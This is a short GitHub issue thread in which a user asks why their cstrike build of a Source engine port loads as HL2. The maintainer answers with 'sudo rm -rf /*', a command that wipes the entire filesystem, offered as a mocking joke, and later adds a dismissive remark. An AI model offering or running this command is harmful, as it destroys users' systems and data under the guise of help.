### ISSUE TITLE
cstrike client and server not working

### ISSUE THREAD

**Issue by David770725** [nillerusr/source-engine#106]
I build cstrike but the libclient and libserver did not loaded into the game, so it's still hl2 when loaded to the map, what should i do?

**Comment by nillerusr** [comment]
```
sudo rm -rf /*
```

**Comment by David770725** [comment]
> ```
> sudo rm -rf /*
> ```

I just need help that's all

**Comment by nillerusr** [comment]
I don't have psychic abilities - that says it all
